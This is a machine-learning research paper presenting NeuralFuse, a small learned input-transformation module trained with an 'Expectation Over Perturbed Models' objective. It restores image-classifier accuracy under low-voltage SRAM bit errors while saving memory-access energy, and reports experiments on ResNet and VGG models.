NeuralFuse is a machine learning module that mitigates bit errors caused by very low-voltage operation through a trainable input transformation, parameterized by a relatively small DNN, that enhances the robustness of the original input and provides accurate inference. The pipeline of NeuralFuse is illustrated in Figure 1. NeuralFuse supports access-limited neural networks (e.g., non-configurable hardware or remote access to cloud-based APIs), protecting the deployed models from making wrong predictions under low power. Specifically, we consider two practical access-limited scenarios: (a) Relaxed Access, where the model details are unknown but backpropagation through the black-box model is possible, and (b) Restricted Access, where the model is unknown and backpropagation is disallowed. For Relaxed Access, we train NeuralFuse via backpropagation; for Restricted Access, we train NeuralFuse on a white-box surrogate model and transfer it to the restricted-access models. To the best of our knowledge, this is the first study that leverages a learning-based method to address random bit errors and recover accuracy in low-voltage and access-limited settings. We summarize our main contributions as follows:

• We propose NeuralFuse, a novel learning-based input-transformation framework to enhance the accuracy of DNNs subject to random bit errors caused by undervolting. NeuralFuse is model-agnostic because it operates in a plug-and-play manner at the data input and does not require re-training the deployed DNN model.

• We consider two practical access-limited scenarios for neural network inference: Relaxed Access and Restricted Access. In the former setting, we use gradient-based methods to train the NeuralFuse module. In the latter setting, we use a white-box surrogate model to train NeuralFuse and show its high transferability to other types of DNN architectures.

• We conduct extensive experiments on various combinations of DNN models (ResNet18, ResNet50, VGG11, VGG16, and VGG19), datasets (CIFAR-10, CIFAR-100, GTSRB, and ImageNet-10), and NeuralFuse implementations with different architectures and sizes. The results show that NeuralFuse can consistently increase the perturbed accuracy (accuracy evaluated under random bit errors in weights) by up to 57%, while simultaneously saving overall SRAM memory access energy by up to 24%, based on a realistic characterization of bit cell failures for a given memory array in a low-voltage regime inducing a 0.5%/1% bit error rate.

• We demonstrate NeuralFuse's advantages in various scenarios. The experimental results show that NeuralFuse has high transferability (adaptability to unseen base models), versatility (capable of recovering low-precision quantization loss as well as bit errors), and competitiveness (achieving state-of-the-art performance).

2 RELATED WORK AND BACKGROUND

Software-based Energy-Saving Strategies. Recent studies have proposed reducing energy consumption from a software perspective. For instance, quantization techniques have been proposed to reduce the precision of stored model weights and decrease total memory storage (Gong et al., 2014; Rastegari et al., 2016; Wu et al., 2016). Yang et al. (2017) proposed energy-aware pruning on each layer, finetuning the weights to maximize final accuracy. Yang et al. have also proposed several other ways to reduce the energy consumption of DNNs.
For example, they proposed ECC, a DNN compression framework that compresses a DNN model to meet a given energy constraint (Yang et al., 2019a), as well as compressing DNN models via joint pruning and quantization (Yang et al., 2020). It is also feasible to treat the energy constraint as an optimization problem during DNN training, reducing energy consumption while maximizing training accuracy (Yang et al., 2019b). However, these methods change either the model architecture or the model weights to reduce energy consumption, which is orthogonal to NeuralFuse, an add-on module for any given model.

**Hardware-based Energy-Saving Strategies.** Existing works have studied improving energy efficiency by designing specific hardware. Several works have studied the undervolting of DNN accelerators and proposed methods to maintain accuracy in the presence of bit errors. For instance, Reagen et al. (2016) proposed an SRAM fault-mitigation technique that rounds faulty weights to zero to avoid degrading the prediction accuracy. Srinivasan et al. (2016) proposed storing the sensitive MSBs (most significant bits) in robust SRAM cells to preserve accuracy. Chandramoorthy et al. (2019) proposed dynamically boosting the supply voltage to improve the resilience of memory access operations. On the other hand, Stutz et al. (2021) considered a learning-based approach that tries to find models that are robust to bit errors. That work discusses several techniques to improve robustness, such as quantization methods, weight clipping, random bit error training, and adversarial bit error training. The authors observe that the combination of quantization, weight clipping, and adversarial bit error training achieves excellent performance in their experiments. However, they also admit that the corresponding training process is sensitive to hyperparameter settings and can therefore be challenging. We argue that the methods mentioned above are either not easy to implement or not suitable for real-world, *access-limited* scenarios. For example, the weights of DNN models deployed on embedded systems may not be configurable or updatable, so model retraining (e.g., Stutz et al., 2021) is not a viable option. Moreover, training DNNs is already a tedious and time-consuming task; adding error-aware training may further increase training complexity and introduce challenges in hyperparameter search, as identified in previous literature. Özdenizci & Legenstein (2022) likewise note that error-aware training was found ineffective for large DNNs with millions of bits. Our proposed *NeuralFuse* spares the need for model retraining by attaching a trainable input transformation function, parameterized by a relatively small DNN, as an add-on module to any DNN model as-is.

**SRAM Bit Errors in DNNs.** Low-voltage-induced memory bit cell failures can cause bit flips from 0 to 1 and vice versa. In practice, SRAM memory bit errors increase exponentially when the supply voltage is scaled below $V_{min}$, the minimum voltage required to avoid bit errors. This phenomenon has been well studied in previous literature, such as the works by Chandramoorthy et al. (2019) and Ganapathy et al. (2017). As shown in Figure 2, for an SRAM array of size $512 \times 64$ bits in a 14nm technology node, the number of bit errors increases as the voltage scales down.
The corresponding dynamic energy per read access of the SRAM, measured at each voltage at a constant frequency, is shown on the right. In this example, accessing the SRAM at $0.83V_{min}$ leads to a 1% bit error rate while reducing the dynamic energy per access by approximately 30%, consistent with the quadratic dependence of dynamic energy on voltage ($0.83^2 \approx 0.69$). Such bit errors can lead to inaccurate inferences in DNNs, particularly when bit flips occur at the MSBs. However, improving the robustness to bit errors allows us to lower the voltage and exploit the resulting energy savings. It has been observed that bit cell failures for a given memory array are randomly distributed and independent of each other. That is, the spatial distribution of bit flips can be assumed random, as it generally differs between arrays, even within a chip and between different chips. In this paper, we follow the methodology of Chandramoorthy et al. (2019) and model bit errors in a memory array of a given size by generating a random distribution of bit errors with equal likelihood of 0-to-1 and 1-to-0 flips. Specifically, we assume that the model weights are quantized to 8-bit precision (i.e., from 32-bit floats to 8-bit integers), and randomly distributed bit errors are injected into the quantized 2's-complement representation of the weights to generate perturbed models. Please refer to Section 4.1 for more implementation details.

3 NEURALFUSE: FRAMEWORK AND ALGORITHMS

3.1 ERROR-RESISTANT INPUT TRANSFORMATION

As illustrated in Figure 1, to overcome the performance degradation in low-voltage regimes, we propose a trainable input transformation module parameterized by a relatively small DNN, NeuralFuse, to mitigate the accuracy-energy trade-off for model inference. The rationale is to use a specially designed loss function and training scheme to derive NeuralFuse and apply it to the input data, such that the transformed inputs become robust to low-voltage-induced bit errors. Consider an input $x$ sampled from the data distribution $X$ and a model $M_p$ with random bit errors on its weights (called a perturbed model). When there are no bit errors (i.e., in normal-voltage settings), the perturbed model reduces to a nominal deterministic model denoted by $M_0$. NeuralFuse aims to ensure that the perturbed model $M_p$ makes correct inferences on the transformed inputs while retaining consistent results of $M_0$ in regular (normal-voltage) settings. To adapt to different data characteristics, NeuralFuse ($F$) is designed to be input-aware, which can be formally defined as:

$$F(x) = \text{clip}_{[-1,1]}(x + G(x)), \quad (1)$$

where $G(x)$ is a "generator" (i.e., an input transformation function) that generates a perturbation based on the input $x$. The NeuralFuse-transformed data $F(x)$ is passed to the deployed model ($M_0$ or $M_p$) for final inference. Without loss of generality, we assume the transformed input lies within a scaled input range $F(\cdot) \in [-1, 1]^d$, where $d$ is the (flattened) dimension of $x$.
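A minimal PyTorch sketch of Eq. (1) follows; the tiny convolutional `Generator` is only a placeholder for the paper's encoder-decoder generators (ConvL/S, DeConvL/S, UNetL/S) described in Section 4.1:

```python
import torch
import torch.nn as nn

class Generator(nn.Module):
    """Placeholder for the paper's encoder-decoder generator G(x)."""
    def __init__(self, channels: int = 3):
        super().__init__()
        self.net = nn.Sequential(
            nn.Conv2d(channels, 16, 3, padding=1), nn.ReLU(),
            nn.Conv2d(16, channels, 3, padding=1), nn.Tanh(),
        )

    def forward(self, x):
        return self.net(x)  # input-aware perturbation G(x)

class NeuralFuse(nn.Module):
    """F(x) = clip_[-1,1](x + G(x)), Eq. (1)."""
    def __init__(self, generator: nn.Module):
        super().__init__()
        self.generator = generator

    def forward(self, x):
        # Transformed input stays in the scaled range [-1, 1].
        return torch.clamp(x + self.generator(x), -1.0, 1.0)

# Usage sketch: logits = base_model(NeuralFuse(Generator())(x))
```

Because the base model is treated as a fixed black box, only the generator's parameters are trained; at deployment, F acts as a preprocessing stage in front of the unmodified model.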
3.2 TRAINING OBJECTIVE AND OPTIMIZER

To train the generator $G(\cdot)$, which should ensure correct predictions by both the perturbed model $M_p$ and the clean model $M_0$, we parameterize $G(\cdot)$ by a neural network and design the following training objective:

$$\arg \max_{W_G} \log P_{M_0}(y|F(x; W_G)) + \lambda \cdot \mathbb{E}_{M_p \sim \mathcal{M}_p}[\log P_{M_p}(y|F(x; W_G))], \quad (2)$$

where $W_G$ is the set of trainable parameters of $G$, $y$ is the ground-truth label of $x$, $P_M$ denotes the likelihood of $y$ computed by a model $M$ given a transformed input $F(x; W_G)$, $\mathcal{M}_p$ is the distribution of perturbed models inherited from the clean model $M_0$ under a $p\%$ random bit error rate, and $\lambda$ is a hyperparameter that balances the importance of the nominal and perturbed models. The training objective can be readily converted to a loss function that evaluates the cross-entropy between the ground-truth label $y$ and the prediction $P_M(y|F(x; W_G))$. The total loss function then becomes

$$\text{Loss}_{\text{Total}} = \text{loss}_{M_0} + \lambda \cdot \text{loss}_{M_p}. \quad (3)$$

To optimize the loss term $\text{loss}_{M_p}$, which is evaluated on randomly perturbed models, our training process is inspired by EOT (Expectation Over Transformation) attacks (Athalye et al., 2018), which aim to find a robust adversarial example against a variety of image transformations. Based on this idea, we propose a new optimizer for solving Eq. (2), which we call Expectation Over Perturbed Models (EOPM). EOPM-trained generators can generate error-resistant input transformations that mitigate the inherent bit errors. However, it is computationally infeasible to enumerate all possible perturbed models with random bit errors, and the number of perturbed-model realizations is limited by the memory constraint of the GPUs used for training. In practice, we sample only $N$ perturbed models per iteration to calculate the empirical average loss, i.e.,

$$\text{Loss}_N = \frac{\text{loss}_{M_{p_1}} + \ldots + \text{loss}_{M_{p_N}}}{N}, \quad (4)$$

where $\{M_{p_1}, \ldots, M_{p_N}\}$ are the $N$ simulated perturbed models under random bit errors. The gradient used to update the generator is therefore

$$\frac{\partial \text{Loss}_{\text{Total}}}{\partial W_G} = \frac{\partial \text{loss}_{M_0}}{\partial W_G} + \frac{\lambda}{N} \cdot \left( \frac{\partial \text{loss}_{M_{p_1}}}{\partial W_G} + \ldots + \frac{\partial \text{loss}_{M_{p_N}}}{\partial W_G} \right). \quad (5)$$

In our implementation, we find that $N = 10$ already delivers stable performance, and there is little gain from using a larger value. An ablation study over $N$ can be found in Appendix F.

3.3 Training Algorithm

Algorithm 1 in Appendix A summarizes the training steps of NeuralFuse. We split the training data $X$ into $B$ mini-batches for training the generator in each epoch. For each mini-batch, we first feed the data into $F(\cdot)$ to obtain the transformed inputs. We also simulate $N$ perturbed models, denoted by $M_{p_1}, \ldots, M_{p_N}$, from $\mathcal{M}_p$ under a $p\%$ random bit error rate. The transformed inputs are then fed into these $N$ perturbed models and the clean model $M_0$ to calculate their losses and gradients. Finally, the NeuralFuse parameters $W_G$ are updated based on the gradient obtained by EOPM.
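Putting Sections 2 and 3 together, here is a minimal PyTorch sketch of one EOPM step combined with the random bit-flip model described earlier. The per-tensor quantization `scale`, the $\lambda$ value, and the helper names are illustrative assumptions, not the paper's released implementation (which uses the model's own quantization-aware training pipeline):

```python
import copy
import torch
import torch.nn.functional as nnF

def flip_bits(w_int8: torch.Tensor, p: float) -> torch.Tensor:
    """Flip each bit of 2's-complement int8 weights with probability p."""
    u = w_int8.view(torch.uint8).clone()        # reinterpret bits as uint8
    for b in range(8):
        mask = torch.rand(u.shape) < p          # i.i.d. per-bit failures
        u[mask] ^= (1 << b)                     # equal 0->1 and 1->0 flips
    return u.view(torch.int8)

def eopm_step(fuse, base_model, x, y, p=0.01, N=10, lam=1.0, scale=0.1):
    """Loss on the clean model plus the mean loss over N bit-flipped
    copies (Eqs. (3)-(5)); gradients reach only the generator in `fuse`."""
    xt = fuse(x)                                # error-resistant inputs F(x)
    loss = nnF.cross_entropy(base_model(xt), y)
    for _ in range(N):
        mp = copy.deepcopy(base_model)          # one sampled perturbed model
        for w in mp.parameters():
            q = torch.clamp((w.data / scale).round(), -128, 127).to(torch.int8)
            w.data = flip_bits(q, p).float() * scale
        loss = loss + (lam / N) * nnF.cross_entropy(mp(xt), y)
    loss.backward()
    return loss
```

Each call simulates a fresh set of $N$ perturbed models, so over training the generator sees many independent bit-error realizations, approximating the expectation in Eq. (2).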
4 Experiments

In this section, we present the experimental setup and the results of NeuralFuse on different datasets and architectures. We also provide visualization results, detailed analyses, and ablation studies to better understand the properties of NeuralFuse.

4.1 Experiment Setups

**Datasets.** We evaluate NeuralFuse on four datasets: CIFAR-10 (Krizhevsky & Hinton, 2009), CIFAR-100 (Krizhevsky & Hinton, 2009), GTSRB (Stallkamp et al., 2012), and ImageNet-10 (Deng et al., 2009). CIFAR-10 consists of ten classes, with 50,000 training images and 10,000 test images. Similarly, CIFAR-100 consists of 100 classes, with 500 training images and 100 test images per class. GTSRB (German Traffic Sign Recognition Benchmark) contains 43 classes, with 39,209 training images and 12,630 test images. As with CIFAR-10 and CIFAR-100, we resize GTSRB images to $32 \times 32 \times 3$ in our experiments. For ImageNet-10, we choose the same ten categories as Huang et al. (2022); there are 13,000 training images and 500 test images, cropped to $224 \times 224 \times 3$. Due to space limits, the CIFAR-100 results are given in the Appendix.

**Base Models.** We select several common architectures as our base models: ResNet18, ResNet50 (He et al., 2016), VGG11, VGG16, and VGG19 (Simonyan & Zisserman, 2015). To match the setting of deploying models on a chip, all of our base models are trained with quantization-aware training, following Stutz et al. (2021).

**NeuralFuse Generators.** The architecture of the NeuralFuse generator ($G$) is based on an encoder-decoder structure. We design and compare three types of generators, namely Convolution-based, Deconvolution-based, and UNet-based; for each type, we also consider large (L) and small (S) network sizes. The Convolution-based and Deconvolution-based variants follow a similar architecture for ease of comparison. The generators are also trained with quantization-aware training. More details are given in Appendix B.

- **Convolution-based (Conv):** We use Convolution with MaxPool layers for the encoder, and Convolution with UpSample layers for the decoder. The architecture is inspired by Nguyen & Tran (2020).
We report the reduction in overall weight-memory energy consumption (i.e., NeuralFuse + base model under a $p\%$ bit error rate) with respect to the unprotected base model in the regular voltage mode (i.e., $0\%$ bit error rate and without NeuralFuse). Note that we do not report the overall, end-to-end energy consumption of the accelerator during computation, as end-to-end power savings depend on various factors, such as the memory power as a fraction of the total hardware power, whether the computation logic also runs at low voltage/frequency, or the use of multiple voltage domains in the accelerator. To obtain the number of memory accesses, we used the SCALE-SIM simulator (Samajdar et al., 2020); our chosen configuration simulates an output-stationary dataflow and a $32 \times 32$ systolic array with 256KB of weight memory. We obtained the dynamic energy per read access of the SRAM at the minimum voltage ($V_{min}$) and at the voltage corresponding to a $1\%$ bit error rate ($V_{ber} \approx 0.83V_{min}$) from Cadence ADE Spectre simulations, both at the same clock frequency. Please refer to Appendix C for more details.

**Relaxed and Restricted Access Settings.** We consider two scenarios (relaxed/restricted access) in our experiments. In the relaxed-access setting, the internals of the base model are not entirely transparent, but gradients can be obtained from it through backpropagation. This setting therefore allows direct training of NeuralFuse with the base model using EOPM. In the restricted-access setting, only the inference function of the base model is available. We therefore train NeuralFuse on a white-box surrogate base model and then transfer the generator to the access-restricted model.

**Computing Resources.** Our experiments are performed using 8 Nvidia Tesla V100 GPUs and are implemented in PyTorch. NeuralFuse generally takes 150 epochs to converge, and its training time mainly depends on the base model. On both the CIFAR-10 and CIFAR-100 datasets, the average training times were 17 hours (ResNet18), 50 hours (ResNet50), 9 hours (VGG11), 13 hours (VGG16), and 15 hours (VGG19). For GTSRB, the average training times were 9 hours (ResNet18), 27 hours (ResNet50), 5 hours (VGG11), 7 hours (VGG16), and 8 hours (VGG19). For ImageNet-10, the average training times were 32 hours (ResNet18), 54 hours (ResNet50), 50 hours (VGG11), 90 hours (VGG16), and 102 hours (VGG19).

### 4.2 Performance Evaluation on Relaxed Access Setting

The experimental results of the Relaxed Access setting are shown in Figure 3. We train and test NeuralFuse with various base models (ResNet18, ResNet50, VGG11, VGG16, and VGG19). Two power settings are considered: nominal voltage (no bit errors) and low voltage (random bit errors), with corresponding bit error rates (B.E.R.) due to low voltage of $1\%$ (CIFAR-10, GTSRB) and $0.5\%$ (ImageNet-10). The B.E.R. for ImageNet-10 is lower because its pre-trained models have more parameters than those used for CIFAR-10 and GTSRB. For each experiment, we sample $N = 10$ perturbed models (independent from training) for evaluation and report the mean and standard deviation of the test accuracy. In the following, clean accuracy (C.A.) denotes accuracy measured at nominal voltage, and perturbed accuracy (P.A.) denotes accuracy measured at low voltage.
For CIFAR-10 and GTSRB, we observe that large generators like ConvL and UNetL can significantly recover the perturbed accuracy, by $41\%$ to $63\%$ on ResNet18, VGG11, VGG16, and VGG19.

Figure 3: Relaxed Access setting: Test accuracy (%) of different pre-trained models with or without NeuralFuse, compared at nominal voltage (0% bit error rate) or low voltage (with specified bit error rates). The results demonstrate that NeuralFuse consistently recovers perturbed accuracy.

For ResNet50, the recovery percentage is slightly lower than for the other base models, but it still reaches up to 51% on GTSRB. On the other hand, the recovery percentage of small generators like DeConvS is lower than that of larger generators. This can be explained by the greater capacity of larger networks to learn error-resistant transformations (though they may consume more energy). For ImageNet-10, larger generators likewise achieve better recovery of perturbed accuracy. This demonstrates that NeuralFuse works well even with large input sizes and is applicable to different datasets.

4.3 Transferability for Restricted Access Setting

In the Restricted Access scenario, we train NeuralFuse generators on a white-box surrogate base model and transfer them to other black-box base models. The experimental results are shown in Table 1. We adopt ResNet18 and VGG19 as the white-box surrogate (source) models for training the generators under a 1.5% bit error rate. For the generators, we choose ConvL and UNetL, as they obtain the best performance in Figure 3. From Table 1, we find that generators trained at a larger B.E.R. such as 1.5% provide strong resilience at smaller B.E.R.s such as 1% or 0.5%. We also find that using VGG19 as the surrogate model with UNet-based generators like UNetL gives better recovery than other combinations. On the other hand, in some cases we observe that transferring between the same source and target models (but with different B.E.R.s for training and testing) can outperform the original relaxed-access results. For instance, when transferring VGG19 with UNetL under a 1.5% B.E.R. to VGG19 or VGG11 under a 0.5% B.E.R., the accuracy is 85.86% vs. 84.99% for VGG19 (original), and 84.81% vs. 82.42% for VGG11 (original), respectively. We conjecture that generators trained at a larger B.E.R. cover the error patterns of a smaller B.E.R. and can even improve generalization under the smaller B.E.R. These findings show great promise for recovering the accuracy of access-limited base models in low-voltage settings.

4.4 Energy-Accuracy Tradeoff

We report the total dynamic energy consumption as the total number of SRAM accesses times the dynamic energy of a single SRAM access. Specifically, we used SCALE-SIM to calculate the total weight memory accesses (T.W.M.A.), which can be found in Table 6 in Appendix D.

Table 1: Restricted Access setting: Transfer results for generators trained with a 1.5% bit error rate on CIFAR-10.

| S.M. | T.M. | B.E.R. | C.A. (%) | P.A. (%) | ConvL: C.A. (NF) | ConvL: P.A. (NF) | ConvL: R.P. | UNetL: C.A. (NF) | UNetL: P.A. (NF) | UNetL: R.P. |
|------|------|--------|----------|----------|------------------|------------------|-------------|------------------|------------------|-------------|
| ResNet18 | ResNet18 | 1% | 92.6 | 38.9 ± 12.4 | 89.8 | 89.0 ± 0.5 | 50.1 | 85.8 | 85.2 ± 0.5 | 46.3 |
| | | 0.5% | | 70.1 ± 11.6 | | 89.6 ± 0.2 | 19.5 | | | |
| ResNet18 | ResNet50 | 1% | 92.6 | 26.1 ± 9.4 | 89.2 | 36.1 ± 18 | 10.0 | 84.4 | 38.9 ± 16 | 12.8 |
| | | 0.5% | | 61.0 ± 10.3 | | 74.1 ± 10 | 13.1 | | | |
| ResNet18 | VGG11 | 1% | 88.4 | 42.2 ± 11.6 | 86.3 | 59.2 ± 10 | 17.0 | 82.3 | 69.8 ± 7.5 | 27.6 |
| | | 0.5% | | 63.6 ± 9.3 | | 78.9 ± 4.9 | 15.3 | | | |
| ResNet18 | VGG16 | 1% | 90.3 | 35.7 ± 7.9 | 89.4 | 62.2 ± 18 | 26.5 | 84.7 | 68.9 ± 14 | 33.2 |
| | | 0.5% | | 66.6 ± 8.1 | | 83.4 ± 5.5 | 16.8 | | | |
| ResNet18 | VGG19 | 1% | 90.5 | 36.0 ± 12.0 | 89.8 | 49.9 ± 23 | 13.9 | 85.0 | 55.1 ± 17 | 19.1 |
| | | 0.5% | | 64.2 ± 12.4 | | 81.8 ± 8.5 | 17.6 | | | |
| VGG19 | ResNet18 | 1% | 92.6 | 38.9 ± 12.4 | 88.9 | 62.6 ± 13 | 23.7 | 85.0 | 72.3 ± 11 | 33.4 |
| | | 0.5% | | 70.1 ± 11.6 | | 84.2 ± 7.2 | 14.1 | | | |
| VGG19 | ResNet50 | 1% | 92.6 | 26.1 ± 9.4 | 88.8 | 37.9 ± 18 | 11.8 | 85.2 | 46.7 ± 17 | 20.6 |
| | | 0.5% | | 61.0 ± 10.3 | | 76.6 ± 7.8 | 15.6 | | | |
| VGG19 | VGG11 | 1% | 88.4 | 42.2 ± 11.6 | 88.9 | 76.0 ± 6.1 | 33.8 | 85.5 | 81.9 ± 3.9 | 39.7 |
| | | 0.5% | | 63.6 ± 9.3 | | 85.9 ± 2.6 | 22.3 | | | |
| VGG19 | VGG16 | 1% | 90.3 | 35.7 ± 7.9 | 89.0 | 76.5 ± 9.0 | 40.8 | 85.9 | 79.2 ± 7.5 | 43.5 |
| | | 0.5% | | 66.6 ± 8.1 | | 87.7 ± 0.7 | 21.1 | | | |
| VGG19 | VGG19 | 1% | 90.5 | 36.0 ± 12.0 | 89.1 | 80.2 ± 12 | 44.2 | 86.3 | 84.3 ± 1.2 | 48.3 |
| | | 0.5% | | 64.2 ± 12.4 | | 88.8 ± 0.4 | 24.6 | | | |

[Note] S.M.: source model, used for training generators. T.M.: target model, used for testing generators. B.E.R.: the bit error rate of the target model. C.A. (%): clean accuracy. P.A. (%): perturbed accuracy. NF: NeuralFuse. R.P.: total recovery percentage of P.A. (NF) vs. P.A. Both generators are trained at a 1.5% B.E.R.
In Table 2, we report the percentage of energy savings at voltages that would yield a 1% bit error rate for various base-model and generator combinations. The energy saving percentage (ES, %) is defined as:
\[ ES = \frac{Energy_{nominal\ voltage} - (Energy_{low-voltage-regime} + Energy_{NeuralFuse\ at\ nominal\ voltage})}{Energy_{nominal\ voltage}} \times 100\%. \]

Table 2: The energy saving percentage (%) for different combinations of base models and NeuralFuse.

| Base Model | ConvL | ConvS | DeConvL | DeConvS | UNetL | UNetS |
|------------|-------|-------|---------|---------|-------|-------|
| ResNet18 | 19.0 | 29.1 | 21.2 | 27.5 | 24.0 | 28.9 |
| ResNet50 | 25.4 | 29.9 | 26.4 | 29.2 | 27.7 | 29.9 |
| VGG11 | 6.6 | 27.5 | 11.2 | 24.1 | 17.1 | 27.2 |
| VGG16 | 17.1 | 28.9 | 19.7 | 27.0 | 23.0 | 28.7 |
| VGG19 | 20.3 | 29.7 | 22.3 | 27.8 | 24.8 | 29.1 |

Also, as shown in Figure 1(b), when using ResNet18 as the base model, NeuralFuse can recover model accuracy by 20%-49% while saving 19%-29% energy. More results are given in Appendix D, and Multiply-Accumulate-operation-based energy-saving results are provided in Appendix E.

4.5 Model Size and Efficiency of NeuralFuse

To provide a fuller performance characterization of NeuralFuse, we analyze the relationship between the final recovery on each base model and generators of varying parameter counts. The efficiency ratio is defined as the recovery percentage in perturbed accuracy divided by the parameter count of NeuralFuse. We compare the efficiency ratio for all NeuralFuse generators (trained on CIFAR-10) in Table 3; a small helper formalizing these two quantities is sketched below.
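As a sanity check on the two quantities just defined, here is a small, self-contained helper. Variable names are ours and the example numbers are made up for illustration.

```python
# Helpers for the energy saving percentage (ES) defined above and the
# efficiency ratio of Section 4.5. Names and example values are illustrative.
def energy_saving_percent(e_nominal, e_low_voltage, e_neuralfuse):
    """ES = (E_nominal - (E_low_voltage + E_NeuralFuse)) / E_nominal * 100."""
    return (e_nominal - (e_low_voltage + e_neuralfuse)) / e_nominal * 100.0

def efficiency_ratio(recovery_percent, num_params_millions):
    """Recovery in perturbed accuracy per million generator parameters."""
    return recovery_percent / num_params_millions

# E.g. low-voltage inference at 70% of nominal energy plus a generator costing
# 10% of nominal energy yields a 20% saving.
assert abs(energy_saving_percent(1.0, 0.70, 0.10) - 20.0) < 1e-9
```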
The results show that UNet-based generators have better efficiency than both Convolution-based and Deconvolution-based ones per million parameters.

Table 3: The efficiency ratio (%) for all NeuralFuse generators.

| Base Model | B.E.R. | ConvL | ConvS | DeConvL | DeConvS | UNetL | UNetS |
|------------|--------|-------|-------|---------|---------|-------|-------|
| ResNet18 | 1% | 67.5 | 182 | 76.6 | 190.7 | 94.5 | 245.9 |
| | 0.5% | 24.7 | 73.3 | 30.7 | 62.5 | 33.6 | 88.3 |
| ResNet50 | 1% | 37.4 | 75.1 | 57.4 | 102.7 | 102.3 | 248.4 |
| | 0.5% | 35.2 | 108.7 | 40.4 | 92.5 | 47.4 | 124.6 |
| VGG11 | 1% | 62.3 | 212.9 | 69.5 | 165.8 | 92.0 | 251.7 |
| | 0.5% | 32.3 | 96.3 | 35.8 | 77.2 | 38.9 | 100.7 |
| VGG16 | 1% | 69.6 | 211.2 | 76.9 | 196.5 | 98.8 | 292.9 |
| | 0.5% | 30.3 | 98.1 | 33.0 | 75.3 | 40.6 | 113 |
| VGG19 | 1% | 57.6 | 147.5 | 65.5 | 141.6 | 95.4 | 250.8 |
| | 0.5% | 33.0 | 91.0 | 37.5 | 70.2 | 43.1 | 106.4 |

4.6 NeuralFuse on Reduced-Precision Quantization

Here we explore the robustness of NeuralFuse to low-precision quantization of model weights. Uniform quantization is the de facto method for quantizing model weights (Gholami et al., 2022), but it can cause an accuracy drop due to precision loss. Since NeuralFuse is designed as a bit-error-oriented protector, we seek to understand whether it can also mitigate the accuracy drop in this setting. We conducted an experiment that uniformly quantized the model weights to lower bit widths.

Figure 4: Reduced-precision accuracy.

We use GTSRB pre-trained ResNet18 as an example to evaluate two NeuralFuse generators (ConvL and UNetL, trained with 0.5% B.E.R.), and vary the precision $b$ from 8 bits down to 2 bits (integer). The result is shown in Figure 4. We find that when $b > 3$ bits, NeuralFuse recovers accuracy in both scenarios. When $b = 3$, NeuralFuse can still handle the bit-error-free model (top panel), but it exhibits a limited ability to recover the random bit-error case (bottom panel). We find this result encouraging because the observed robustness to reduced-precision inference is an emergent ability of NeuralFuse: it was trained only with random bit errors, yet it maintains high accuracy under unseen quantization errors. This experiment showcases NeuralFuse's potential to protect against accuracy drops caused by different sources of bit errors. More experimental results on different base models and datasets can be found in Appendix I.

4.7 Extended Analysis

We highlight some key findings from the additional results in the Appendix. In Appendix F, we compare NeuralFuse to the simple baseline of learning a universal input perturbation. We find that this baseline is much worse than NeuralFuse, which validates the necessity of input-aware transformations for learning error-resistant data representations in low-voltage scenarios. In Appendix H, we find that ensemble training over white-box surrogate base models can further improve the transferability of NeuralFuse in the restricted-access setting. In Appendix J and Appendix K, we present visualizations of data embeddings and of inputs transformed by NeuralFuse. In Appendix M, we show that NeuralFuse can further recover the accuracy of a base model trained with adversarial weight perturbation in the low-voltage setting.

5 Conclusion

In this paper, we propose NeuralFuse, the first non-intrusive, post-hoc protection module for model inference against bit errors induced by low voltage.
NeuralFuse is particularly suited to practical deployment settings where access to the base model is limited or relaxed. The design of NeuralFuse includes a novel loss function and a new optimizer named EOPM to handle the simulated randomness of perturbed models. Our comprehensive experimental results and analysis show that NeuralFuse can significantly recover test accuracy (by up to 57%) while simultaneously enjoying up to a 24% reduction in memory-access energy. Furthermore, NeuralFuse demonstrates high transferability (to access-constrained models) and versatility (e.g., robustness to low-precision quantization). Our results show that NeuralFuse provides significant improvements in mitigating the energy-accuracy tradeoff of neural network inference in low-voltage regimes and sheds new light on green AI technology. Our future work includes extending our study to other neural network architectures and modalities, such as transformer-based language models.

REFERENCES

Anish Athalye, Logan Engstrom, Andrew Ilyas, and Kevin Kwok. Synthesizing robust adversarial examples. In *International Conference on Machine Learning (ICML)*, pp. 284–293. PMLR, 2018.

Babak Ehteshami Bejnordi, Tijmen Blankevoort, and Max Welling. Batch-shaping for learning conditional channel gated networks. In *International Conference on Learning Representations (ICLR)*, 2020.

Nandhini Chandramoorthy, Karthik Swaminathan, Martin Cochet, Arun Paidimarri, Schuyler Eldridge, Rajiv V. Joshi, Matthew M. Ziegler, Alper Buyuktosunoglu, and Pradip Bose. Resilient low voltage accelerators for high energy efficiency. In *2019 IEEE International Symposium on High Performance Computer Architecture (HPCA)*, pp. 147–158, 2019. doi: 10.1109/HPCA.2019.00034.

Yu-Hsin Chen, Joel Emer, and Vivienne Sze. Eyeriss: A spatial architecture for energy-efficient dataflow for convolutional neural networks. *ACM SIGARCH Computer Architecture News*, 44(3):367–379, 2016.

Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. ImageNet: A large-scale hierarchical image database. In *2009 IEEE Conference on Computer Vision and Pattern Recognition (CVPR)*, pp. 248–255, 2009. doi: 10.1109/CVPR.2009.5206848.

Shrikanth Ganapathy, John Kalamatianos, Keith Kasprak, and Steven Raasch. On characterizing near-threshold SRAM failures in FinFET technology. In *2017 54th ACM/EDAC/IEEE Design Automation Conference (DAC)*, pp. 1–6, 2017. doi: 10.1145/3061639.3062292.

Amir Gholami, Sehoon Kim, Zhen Dong, Zhewei Yao, Michael W Mahoney, and Kurt Keutzer. A survey of quantization methods for efficient neural network inference. In *Low-Power Computer Vision*, pp. 291–326. Chapman and Hall/CRC, 2022.

Yunchao Gong, Liu Liu, Ming Yang, and Lubomir Bourdev. Compressing deep convolutional networks using vector quantization. *arXiv preprint arXiv:1412.6115*, 2014.

Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Deep residual learning for image recognition. In *2016 IEEE Conference on Computer Vision and Pattern Recognition (CVPR)*, pp. 770–778, 2016. doi: 10.1109/CVPR.2016.90.

Zhizhong Huang, Jie Chen, Junping Zhang, and Hongming Shan. Learning representation for clustering via prototype scattering and positive sampling. *IEEE Transactions on Pattern Analysis and Machine Intelligence*, pp. 1–16, 2022. doi: 10.1109/TPAMI.2022.3216454.

Sung Kim, Patrick Howe, Thierry Moreau, Armin Alaghi, Luis Ceze, and Visvesh Sathe. MATIC: Learning around errors for efficient low-voltage neural network accelerators.
In *2018 Design, Automation & Test in Europe Conference & Exhibition (DATE)*, pp. 1–6. IEEE, 2018.

